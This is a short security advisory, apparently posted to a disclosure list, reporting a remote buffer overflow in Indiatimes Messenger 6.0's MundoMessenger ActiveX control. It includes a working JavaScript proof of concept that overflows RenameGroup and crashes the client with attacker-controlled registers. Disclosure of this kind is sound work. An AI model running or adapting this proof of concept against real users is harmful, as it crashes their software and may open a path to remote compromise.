Indiatimes Messenger 6.0 Buffer Overflow (Remote)
Indiatimes Messenger 6.0 Buffer Overflow (Remote)
Vulnerable Program : Indiatimes Messenger v6.0
(Latest)
Vendor URL : http://messenger.indiatimes.com/
(Attempt to contact thru
http://messenger.indiatimes.com/feedback.htm failed!)
Exploit Type : Remote DoS (Remote Compromise may also
be possible)
Discovered by : Gregory R. Panakkal
Proof Of Concept:
[script]
var obj1 = new
ActiveXObject("MMClient.MunduMessenger.1");
var buf = "";
for(i=0; i<1000; i++)
{
buf += "A";
}
while(obj1.GetServerStatus() != "Logged In"); //wait
till login
obj1.RenameGroup("Friends", buf, 5);
[/script]
The program (MMClient.exe) crashes @
004B681B 8979 04 mov dword ptr
ds:[ecx+4],edi
with registers ecx, and edi = 0x41414141
[controllable]
So, remote compromise maybe possible (not confirmed).
rgds,
Gregory R. Panakkal
http://www.infogreg.com
__________________________________________________________
Yahoo! India Matrimony: Find your partner online. Go to http://yahoo.shaadi.com